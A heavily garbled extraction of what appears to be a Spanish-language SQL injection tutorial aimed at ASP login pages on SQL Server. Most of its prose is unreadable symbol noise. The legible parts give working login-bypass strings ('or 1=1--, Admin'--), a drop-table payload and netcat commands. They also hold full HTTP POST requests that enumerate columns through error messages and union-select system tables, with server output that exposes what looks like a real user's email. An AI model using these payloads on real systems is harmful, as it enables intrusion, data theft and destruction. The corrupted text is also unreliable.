! ! #$%& " ' " * +" ( ,# . / "0#$% ' " , * ) 1 % )" + ! " , * , ") - ** 2 #$% ' "- " " 3 #$% 4 ) ? @ B C ) 5 , ! ) %" " 5 " 67" * 8* " . 5 9 ", # :) * * #. 8< + " " ) >; ) 5 4 ' " ; 4 # ! 4 ! ', * #$% 4 : "' " ' " "A " * "+% "' ; " A " "' ) " 5. " "" ) " " " ! 6 . " #$% 4 + ;7 " . / ; " = " " " .> ", " " " 8< " " # , " ! , " " " " " # 8 " )4 " 7 # ) " " + = ) & " + . " ! . 7 6 & " "+ " 9 & " " " . " ( " & D " 9 & " " ( * 6 + * " 6 . " " 6 ( "" " 4 "" " 7< " ) " " " " " &" " "& "= . (( # + 2 ; " " " * 5 " . " 6 " . " " " 6 " ) & " ( " ") ) * 9 " 7 " 6 (& . 4 #$%& " " " " " * " 9 " " $ !% & ' 5 * " D C 2 . 6 " . ' " * 9 " " 9 ( " ) 4 & " * ) 4 " " % #8$ 8% * * & ! % . . = 4 " " " " +& "& + " D " " " & . " ) " " * ( & " " " )4 " ) 4 ) 6 9 " ( ) " + 8 . " 6 7 " 6 " . "& * 9 " & " ># " " ) " " 9 . 4 #$% " 6 E#+) " & : + " 51# CB@ + " 9 " .& 9 +" " ") " * " ) " . 4 "& 9 " ") " " . " 4 " . 4 + % . . > * 6 D C & #8$ 8% #$% E# $ + % . . F $ " D " ,- & 9 9 + = * <F #: * " " 6" .= . " . 4 4 " 6 " . 4 " " " * CB " #$%BC + #$%C & " 6 " " " 6 . " " " " " + ( " & " " ) 6 " " >! #$%> " 9 4 " ) ) " 6 " " . " 4 " "= 9 " #$%2 . 6 "& 9 " + 6 6 " 6 . 4 ( ) * # +, $ ( " " " " " ) " " " 9 - + " *& ) 4 ) 4 " " 9 " = " " = ,:# ! 9 "& 9 " * " & " ) ) 4 9 " 6 " 2 G " E, . * & " 6 " " " " "" F& " * ) " D= " " ) " ) :# & " " " ) " ) " . " 6 " !' " " %51 3 5 ) & ( ) " "C & 9 " & ) 9 . ) " 6" 9 4 & " 9 " ) * " . = " 6 6 " # & ) " 6 " 2F " 9 " * 9 " ) :# 2 % " ) 7 " 9 " ") " ) " " 9 " 8 "" :# " 6 & 6 ' " 9 & - " * " " * " , " " 6 "6 " " #$% @ & " " . " " " " " . " " "& " "& "- .# ' * " / " . ) = . ! 0 9 6 "& + 9 6 " " " " . ) * = 9 " 6 6 " #+) " :# + G + 9 " " 1;& + " * 0 " " " * #$%& " * 9 ( " . CC? " "9 . ) " #0#$%& ) 4 & " " F& " " " 6 " #$% . & " " * , ) - 6 " ) " 1;> H " D CC2 " &" " G & #+) " 5 )= " " " . E#$% 6 " " 9 . " " ) ) " " 1; 67" " CCB . ) 9 9 " ) " - " 9 " . " " . " " 9 D CC = " * #$% # 6 3 * ( " " ) > ( = & + 9 = ( ) . "9 " . 6 , " G & " " * = " " , " :# " ) 7" " " &" * * "9 " *& 2 G " 1; " . " 9 " " E! 9 ) 4 = " " * #$% " 6 " & " I) & " " ) . ( #$% # 6 & "6 ) " " & " " " " 6 4 "" & 9 " " " " 4 6 " " =" " * 9 9 #$% # 6 & " " " " " "" < " *& * " "& " " " " . + ) " " ? # ) 4 )6 ") & * " " ) = + " " #$% ) " & " " ) " " . 9 . & "9 " " & "9 & " ) " ) 4 " E' " " " " #0#$% # 6 & 9 " ) " ) 4 . & " + " J 6" 8 6 " " " ) & " " . " " . " . )4 " F %# " & " 6 & . " " " #0#$%& " " "& 9 8 " >#5> + " 8 ) < " #$% 9 " #0#$% 9 " 9 " 4 " " 5 E8" # 6 & 5 ) " 6 + ) " . = < < 6 " " "" & " 9 ( ) " ) +* " " " " " . ) " " " I + ) 4 & " & * " 6 #0#$% # 6 & "" 6 " " 1 % )" F + = " * " " " * "& ) = " 4 " " ) 4 " " " " " )7 & " E#51& 5 ; M& !N #!N& ;'!& ( 9 " 9 " " & " " " ;'! ! + 1 ! " & " " + F * 4 4 9 " " " " " "& . " " ) " ) "9 " 9 . " = & 9 (. " "6 4 " EIF " ) " " "&" 6 . "& " 4 " "6 " ". " * . " > > EKKF " " " " 6 7 "& + " 6 "" "* ( 1 ( * $# #0#$% 6 L"& . " " " 6 #0#$% " #5 " " " < " " 5 ") " " " ) ; " " " " " 9 " & " 6 ;'! 332 . " " " 9 " #0#$% . )9 #0#$% @ 8 * 6 " 6 #$% E! 4 7 & " 6 "& "6 ) ) " " = #5 " 9 + "" > >F " "9 6 #$% )7 "& ;:,:# . " " " D " " . " " " " " " " " ) " . " * " " 1 + ( & ,#)) ; , 6 % * #$% # 6 > O#$% # 6 "* " - ** " " " > 8" 9 " " * 6 P & ,! " ) < " "6 " " . " " +" " ") 9 5 " " " " " ) ! " Q " Q " Q . 9 " < " " " " & " " ) ** #$%& > M . 8< " G ) ** " ) " >" 6Q * EF> "" Q M9 Q " Q < Q" "9 " Q"9 . 6= " & " ") ") " < = > E #-1 B303B 022CB0@F ) < < < < < < ) " 6 "& " " " " " # ) * " " 9 * " #$% # 6 9 ) ". * >; ! * " " , ") 1: < " " + " " " "& " " + " > M . 8< " " 9 Q Q" Q " Q " " 6 " < < < < + " 6) -""" " Q " " Q " + + + "" " >& " G ( " "2 % & ; , " " " 6 " " ) & #$% " * " <" " " : & ; " 0#$% "& < " . " & " " " . " % & / 51; 8H:R8 ,81S +% + ++ + "& " " " ( " " " " " 6 . .# . & 6 " ) "& " = ) " = " " ) " . . * " " * #! .# . ." " " "* . . " ." "6 " " ." ( " & ) " " J * " * " " "9 ) " " " "+ " ) ) " " " * ( " * " %! # #! ( A : G 8 8 ( ( / : ! -S 5H 1/ : ,8 -S " & . ( . 6 " .# . + ) " " * ! ( ,8%8;8 "" % + ( !,5;8 %! # #! % " " " " * ) 1#8 ; 5 " E!%0#$% " *F " ( + " " " " ( 8 5%;8 #8%8'; " ( ( ( % & ' 85;8 , :! % & . 4 ( ( " * " " * " ." "9 " . " < " ) " ." " 6 " " "9 ) " 6 " " ." "" " " =* " 9 ) " "* . " ." "" " " * "9 B 3 % & T U TU TV UV V -8;G881 % R8 1 + ," . . 9 + ( . * " 9 9 9 9 6 6 " ( ( " * ." " ) " " 4 & ! SELECT * FROM Tabla; E8" " 6 6 " " " ." " ) >; ) >F UPADTE Tabla SET password = 'Juajuajua' WHERE user = 'admin' E8" " ( = "" " & 6 F 5 4 " ) & " " " "& " " " 9 . 4 #$%& " 4 " " ! 4 4 " # ) " & " 6 " & 9 6 " " #$% " " = & " " " " " "" " 4 " " " + #$% & . * " ) & " & 7 9 " + 4 " * * "* & " " 6 " 9 + . " 9 ") "5 # # 67 " H ) ") " 9 = " & . ( . " ' * " . 8 & >& " " " 9 "& " . " >5 9 " 9 * 6 & " "9 " #$% ) "& " C " 6 " " ) " " = # ) & )4 < 6 " " ) " . * " * " " "6 " " " ") " " " " 6 " 9 . " * " " " ! . 4 " " . 4 . " )4 6 " &+ " " " ) 4 * * ( 6! # ) ) " 6 & " " 9 8" " 4 #$%& 5 + 4 >#$% #0#$%& " * " " "". " " " 8 " " = " * . 9 * + 9 . )4 6 " 4 > " "9 & ) " " . J " " & 9 < ( * 4 " 8" " " " " 9 + &) 4 " 7 " . & " " " & " # ! 6 . " #$% 6 " " " 7 .J . & " ) . " " 0 8* " 05 9 ", # 0 :) * 0 8< + 0' " ; , J # 9 " " ! " "& & " 6" < ) 9 " 5 * " " 6 + 6 9 ) 7< ". * " 6 "9 9 . " &. " "* " ) " " "9 6 " + "" ) " " " " 6 " ) " 4! $ (! & 9 " " 6 .= " " " " " ) " "G " " " 5#! =" " 9 &* " < " " " 6 " < " * "& " ". * " " =* * # 6 " ) " " " #0 G " 9 * " " ( " 7< " " " 8 9 + 6 "9 ( " 8" 9 " = " " & "9 " " ) " 9 " ) 6" " " ) " & " " * " D + :M& " " " " " "+ 8 " " " " ) &" " 6 " "& ) " ) 6 ( & " = " "" " = " " 6 )& " ) " " 6 " " " 9 " " : % * " ) " & + = ) " " " . . < " . .J 6 " " " * 9 " " " " & " "& " ) " )9 " " )& " 6 "& + " ) . " " ) ) M. " * " * * 6 " " " 6 "" " " " " "& )7 ; ) + = 6 6 " ) ) 4 " ( " 6" ) " " . " " " * . ) " <FORM action=logon/logon.asp method=post> <input type=hidden username=_UserName password=_Password> </FORM> 8" * . 9 + " J . " " " " . " " . &) " " 6 " " 5#! " " F 8 + 6 " " " & ( " . " " . 5#! ) " " E! * ; %& 9 ) " "& . ; % + 6 6 & * & ) " . " " * 6 + . "= < * ) ) select * from users where username = _UserName and password = _Password 5 * " ) 9 " " " 6 " 6 6 " " " " . " "II ) & " 4 ( " & " "= + " " " . &" . & " & + ) ) " " < " % " ) " * " " http://www.objetivo.com/libreria.asp?edicion='Noviembre' ! " " & " " " " ) + ) " " L1 6 ) L " " " " ) 4 . "* " " " % 9 " = + ) " " " " . " .= EN,F )7 " " 6 . 5#! 9 8 " " & + ) ) . ) " " " . 9 * 6 " 6 . " select * from numeros_anteriores where edicion = 'Noviembre' " #$% > " & " 6 9 = >& . & " ) " " " + " " 9 . & " " " "* " " " " * . " ) 7 " " + " + " 9 + 9 ) " #$% 5 6 " & E' " " " F # ) " " " ! " % L E' # " 4 &" + 9 " ) * + F " "& " " "" " " ) 4 " " ) L " ") + " * #$% # 6 " " * * 6 9 9 " 9 6 "" " ) #$% 9 * " ( "9 4 ( " 4 & ( " . H " " = . " " " " + & " " " " ) " Usuario : An'gel Password : 338xD select * from users where username = 'An'gel' and password = '338xD' . select * from numeros_anteriores where edicion = 'N'oviembre' 8 ) " " . " " 9 " #$% # 6 & " 9 . " " " . 9 " "" & " ( "" " 9 " " " " + username = 'An' edicion = 'N' % . & ". "& " " 5 " ) 9 " "" 8 " 9 " #$%& * " " = " & . 6 " 67" " 4 " " + & " . " 4 " 9 9 " #$% # 6 ( & & ". * " " L5 L + L1L II 9 . "6" ) " "+ " " * " " ( 9 + * 9 6 " " . "9 .J 6 " * %& " " " & ( * " ) "& . " 8" " " ) " 8 " * " + A * 6 " ") " " " " " 6 & 6 6 9 " . ) = & 9 " " )7 " ". 9 " 7 " " # 6 " . #$% ( ( 6 ) " E84 " )4 . " . & " 6 9 " " " + ) 4 " " " . & " 6 "& " * " 9 6 " " & ) ) " " )" " " " " " . . " . " .J . " " " & 7< ) " & < " 4 9 )7 & " " " " 6 " " " ? >8 # 6 >F "6 " 9 + #$% " 6 ) " " 9 "& 9 ) " " ) 4 + " ( " ' " ' & " ) 4 > . #$% > EH B * " + " "F 9 " " * . ". " < 2 1 $ % & ' +! 0 (#)* , -. , / % , , - 123 % & ) " & 6 9 * & ) + " ( " * " I "" " ) " " + = " & "9 "" "" . )4 6 6 6 " " !8 ( . " 7 " #$% 4 . " 9 " " "& 9 ; %& 5#!& & " " " 6 ( 9 # 6 ' " 9 " ) "& 6 ) & " & 4 & . & 6 " "* " ) & " > 6 * "6 & " " . 9 & 4 & ) "= 8 " * " & ) " " ) . " * . . >. . >F " > ) 7 "6 # " "& " "& + "9 .J ) " E! " ." > >% " ' "> " ) " " " " 9 " " " ) 9 ;:,5 * " " 6 ( ! " ( &" . " = & " . . " " " "& ) " " " " " " " " " " 9 7 = " " "6 " ) " " * " * " ) 6 & "= " " " "& . " " + = " . " 7 9 . & 6 " # ) & 1: ) ) " " & "6 " " ) E8" " " ) 6 "+ . F * + = ) . " " " " . " " " < #$% "& .J " " + ) 4 * " EH > % " ' ">F " > " 9 & " 6 " " 9 )7 "> " ) ) " " 6 " 6= "> " * * " "& +J " & . " . " = ) " 9 " 3 $ (! 6) " " " " " " / ! "+ " " " * " 6" " H 7 " " ! " * = " . "& " " . #$% "" " . I) & E> L >F * " ) 6 " + " = (! " .J " " " "6" + " 9 * " . " " " " " ; % 5#!& * " " " " 9 6 "9 " " " 6 "& . " # 5 : + !5##G: , " " . 5#! 9 ) " + 6 #$% ; ) 7 = " 9 * " " 6 #$% " <"" . " " " 4 " " 6 + = ) * ) & 3( " & # " : 0% & " " "+ " .= & ! . " " " D " 9 6" + ) " < " "+* " " " " & 9 4 4 4 ) " . " 4 " " " " " "" " " ) "& 9 " "& " . " " 6" * . 5 " " " " & ) ) * "& ) . " " + * "& " " ) 6 " " " " * " . 9 . ! 6 " " . *= " " = " " "& : 0% .= "" $ ! . 86 , * " " " ) & " 4 8" " * . < = " ) . *= ---- Extracto ------------------------------------------<FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial, Helvetica, sans-serif" ? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---- Extracto ------------------------------------------! " 9 . 4 * 5#! E! "9 5 ) &" 9 6 " " " " ) . ( " = " & ) 4 & " F . " ( ; % . " " & " " " " " " 9 * + 9 " #$% " 6 "6" "& + " " "& " ) " select * from users where username = 'Angel' and password = '338xD' ! " " 9 ) " ( " "9 " + ( "" . " ) * <" 6 9 = 6 ) ) " 9 * " + " ) * 4 = " " #$% " " " D . " " I :M& " + 'or 1=1— " 6 " . " Usuario : 'or 1=1-! "" L V W A 47 " "& . 9 = " . ) select * from users where username = ' or 1=1-- and password = ' or 1=1-- + @ 1 9 " "" . 9 " 1 ( " 6 6 + = <" " " " " " 6 " "6 E "" " " >: > 9 " " ) . " " & F& , 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) " > " # ) " & " ">& " #$% "& . + " < " ( 7 " . + & ( #. "" + " 6 . " 4 )4 . " & " " & " 6 + > 00 > E, ) & #$% 9 . " " 6 & .J " & " ) " 6 " & 6 4 . F " " " 9 6 . 9 . " 6" " " "& " " " * " / " . " >5 > 9 > <" > " = Usuario : Admin'-Password : 'or 1=1-8 = & " 9 " " = " " " . select * from users where username = 'Admin'-- and password = ' or 1=1-# . 8 E' 6 " * "= + " . " & "6" " 9 4 ) 6 F " " + & ) ) + " " ">L> " + > 00 > E, ) / F " < "& " ) " " " " > " " . "> " ) 4) 5 " #$% 6 . " " " # ' * + = $ 7! . " + " ) " " . " "& 9 6 " J " " * " ) 4 " " 9 6 " * " 6 . . "" 5 6 ! " 9 " > " 9 " < + " " . "" " 6 " & . " ) " 9 D " ( ) * " ) ) " " * " < " " ) 9 " .9 + & 6 = " " ) ) "& " " . ". * 1 " * " ) " 6 " )4 ) " " )4 " " 8 ". * 6" " " + % # #$% # 6 & + " & " 6 . " " 6 & " > " & " ) +> > " " ) " " #$% # 6 " " " " "& " "9 " . " " " ) " 9 > 9 " + *. " " " " E' + < " F& " " " " " " " . & . 9 " " ) " " "& + " 9 " " & 4 & " 6 " " " " " 6 " " " & " 6 " 4 & " + * " " ) " < 6 . & " " " . " ' ; "" 6 ##$%#8 H8 < >< Q ) " )Q "& "* . & " * " $ 7! . " ) # " " " 17 ! " ". & ) 4 ! " 6 " 6 " " * "& + " * ) " " 8 4 .J " " "& " " " ) "+ B . 6 9# + & % " 9 " , . # 6 & " 6" " " " " E8 " " ) " = "& 4 " ( + ( & F 5 9 * 6 9 " " " 6 " &6 9 4 " " ) " "9 .J 4 " & . " " 6 . & + M #$%& " " &" " " D " " E' = " 5 9 " 9 " . " " 6 * " & " = 8 " . " "6" " . 6 9 J " " " ) & " " = 4 & F & * " 9 * & & Usuario : '; drop table usuarios-Password : # * EH " ) ) ) & ' 6 " * >8* .J & 9 7 " > " &" " " "> " ! 6 & " * + ) ( , # " " ) "& " " " " & " 6 & " "9 ) . " >F & " . " 9 * " " 9 " 6 " " 5"= + 6 " ( & . ) = " & + 1 $ % + 67 ) : 3( ! ) ) 7 " ) & #$% ( 4 " D # ) " " " " . % & 4/ . $ ! #& " * " " " " ( & " " ") " 9 ) " :,-' :%8 ,4 " #$% # 6 . " 9 & & " " "E ) "6 & + " . " "9 "& " ) . " ) " " ) " . 7< " " & ( = & 9 " " * F C "9 1 " " "6 ) " 8 & " " "9 ) " ! " " " " D 6 6") " . " &" " &+ " 4 " " " + " 6 (" "& +* " * .1) 8 6 + "9 * " " " 6 ( ". > L > E' * " " 4 # 9 " 6 " " < " " " & " " F " & 6 " " ) " " . Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '\')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login='\'') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. - & 6 :)6 % " E 2 ! 3 8 ? . 1 "9 * " < " * #$% < ) " " " > )Q ) >F " * )Q ) & ) ) " " ( " " " "> . > & " " :,-' " " 9 " 6 + :,-' 8 " )Q . " " 9 6" " "> " . > * ) 3 % ) 010.8#* - "3.9$ (")-#) 123 :;<< 9 + ----- Fragmento ----------------------------------------<?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX ([email protected]) * Modified by XXXXXXXXXXXXXXXXXXXX ([email protected]) * * $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $ */ class var var var var var var var var var DB_Sql { $Host = ""; $Database = ""; $User = ""; $Password = ""; $UseODBCCursor = 0; $Link_ID $Query_ID $Record $Row var $Errno var $Error = = = = 0; 0; array(); 0; = 0; = ""; ----- Fragmento ----------------------------------------6 " " . &" * * A * " )Q ) " " " >" " > " 6 ) " X " + X! "" " 9 " ( " " " . " "6 & . " 6 4 * . 9 & " "& 9 * 9 9 6 " " + 6 & " " . " " . " " < 9 " " ) E8 " " F : ) & * / :M& 6 " " * 6 " "& * + " " " + . & " 9 4 . 6 " " " " " " " = #$%& 6 " " 6 " ) " " " ! 9 + #$% ) " ) 9 " " 4 ) " ) " " . " * " + 6 + 8 " " " ( 6 " 7 " #$% " 4 " & " ( & " " ! " 9 6 4 6 " " ) " ) " " # "6 " "& " " & J * " " ) < 9 " " " ( 6 +) " " " 9 " " B " * " . 7 " 9 D " < & " " 9 " 6 " " " ;;! " )4 6 & " 6 " < & & ". * "' "+% ) 4 F 9 7 " < "" " " " " 6 % E8 "' ". " . " 9 " ;;! M "F& E5 . . = 6 " "& " 6 & " * " ( " 6 nc -vv www.objetivo.com 80 < sentencias.txt ' ' " & ( 8 9 ) " " 8" * + + " * " ** * F& . " D " * " " ;;! * E8 " " * # +1 & " . " ) )4 6 . " " E5 . ) " " " F& " 6 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H . " >! "" > Y Y H * - & " ! " " " * ( * 8 " . . " 9 "" < 6 " " " + & 6 6 " ) " ! " " " * 9 " 7 ) 4 !:#; ) <& 4 " " . " . + ) " ) > L > E' 9 " ( 6 " " F & * " 6 " ) " " " E 6 .& . 6 "" ( > " > "> #$%& " * 6 9 #$% E 4 :%8 ,-F ) " " " 6 " " " " > " )4 H 6 ( " " > " . " . " ** ) " 9 ) * " 4 !:#; 9 > " " " < " 6 6 " )" 6 6 ( " )+& ) " #$% 9 F " ' " " " * " 9 < & " 4 "& " 4 " * 6 " " " " 6= " " " * ( 6 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L 6 . V 00 E8 Z 6 .[ Z2, 00F " 2 1 . $ 3 " = )*1( 5*'> ! " " ) " ) " " % ) 9 6 6" "". " " "> > " " " " 6 ! \ ] 5 ! [ 0 ^ Q 9 6= " 6 " " ( " & +6 ( 9 " 9 " ) " Z 0 Z?' Q 4 <& " " 9 " " ! 6" 9 " ;;! " Z Z2Z25 [ Z Z2, Z ' Z B Z C Z28 Z2' " - M# " " 9 " " 8 * " " " 4 = " !:#;& " + ' # ! +' , "! " 8" #. . ' ! 7 "" ! 7 "" + OO V & E F U T :MK 6 "" " " " ( 6 6= " &+ 6 " " " ) "9 " nc -vv www.objetivo.com 80 < Injection.txt > result.html - 6 "9 ) ! " " " * " H " 9 6" " " 9 9 4 " * & " "" " . " " + " " + " 9 . " " * " 4 " > 6 .>& " & " " 7 ) 3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 ! * KK " " " 4 " ) ) " E # 5 :#F& "= " 5 " " H 9 6 6 " "& " 6 " )7 " 9 & & " = :,-' ( ) * ) & " * < + ( " " " " " 6 !:#; 4 " " )" 6 9 #$% # 6 " 6 6 * " " . " E " ,F * " " ) . = & * " # 5 :# ) POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-&txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " H + L. )+ " " " , 6 . V 00 % . " 4 6 " = &6 " ". Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select ? list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 6 ( " " 6 ( + " " #. , ) " " > . " > > 6 > " & " 9 " # 5 :#& .= & " " " 9 " ) " >. " )+> " " # 5 :# " "& " + 8" " = " > 6 .> " ) , " ) * " " ( "+ " * 'group by usuarios.UserID,usuarios.UID having 1=1-#! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 @ * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre, usuarios.Email having 1=1-#! ! * HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date: Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private Object Moved This object may be found here. :M " 9 =& " )" 6 " + ) ". > " "8 > 8 9 " 9 & ) " . * ) " . " > > " ( " #8%8'; . E/ "1 F A=4 " 9 " " !:#; ;;! 1: " &" 9 " " " 6 . " " " " ) " "& 4 6 9 #$% 6 + E8" " L. 6 . V 00F , * " )+ & " " & . ) 9 9 " " 9 " * ,& " " 9 " " " " ,& " & " " " " + " " " " ( ' " . " " "1 ) & " * "8 " ) & " " "" . " 9 ;:,:# " " #8%8'; . & " "& " " #8%8'; " + 9 * " II 6 " 4 < " # " " . SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y ( ) = " ) = . * "+ ) 7 " " " E8" " >& > <" > ?> E, * " >#8%8'; _ A : ` a> " " " " 7 F " ( . " " ) " > >. )+> + > 6 .>F " > + > 2>& " 9 " ="&" * ) " " " " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3 D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" ") V) VL " "L )+ " F )+ 00 > "> 9 " " ) " " " III H "& ( " + = 9 " " # * " ( " . & " " + % . " 1 :1 " . + 9 " " " & " " " " ) " "" #S#:-b8';# + #S#':% 1# " > ,> * 9 " ) " 6 ( " ;:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'; 7 " "& "= * 9 ) 6 " " B 4 ;:!& " " ;:! F ;:,:# 6 !:#; % " 9 = " " 9 . )4 ) ) " " " 6 " " " . " " " & Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 -7 " " " E! >F " > ! 6 " & 4 4 9 " " " " 4 " " " +J ") " 7 " . ( " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int. /Login.asp, line 85 :M& 6 " :,-' " " 9 ) # 5 :# " > " # )!% #, > % . 6 ". ;:! + " . ) "+ " :- .# 5 ". ) ! #& & 6 "& " ) " & " " &+ " & ) " " & ># 9 )7 " " " % . " D * " " * " # " + " 6 ( 9 " " ) " ) + " " 9 " #$% > 1 :1>& " 6 . " " EF> " # ) " 1 :1 " " " " >) " "> . 4 #$%& " 9 " J " * "& " ) J 6 " ) " " ! 4 & " 1 :1& " " " > " " " " " ) " " ! " EF& " ) " 7 9 " * " " J >& " ) . C 5 9 ( " "4 ; ) " & "& " ". . " . " " 6 " " 6 " 4 < + 7 " + " " * 9 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * . " Y H + L " " E ,F& & & * " "00 6 ( "& . !:#; " < 6 ". 4 " " 6 " = 6 & ) )4 1 " " Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument. /Login.asp, line 85 ) " " & 9 " " I8 , ) ) " " ,> 9 " " 6 E> " ( " " & " " " 6 9 6 " 4 4 " " " F 1:& " 9 = 6 :,-' " " ) 9 ( " 6 " " " " " " ) & "= & + ) 2 " " 6 " #$% ) " #$%KK& " 8 " "& "& " " " " ) # " " ) " " ) " E! " " " " + ) " "9 ". 4 6 " 6 & . " "" "& " . #$% ! . * & )" 6 1 &( ! # 5 :# 6 6 " D " " 6 , " . ) " &" * "& " " )4 6 " " " " #$% 1 :1& 9 " " " ( & ; !: ,8 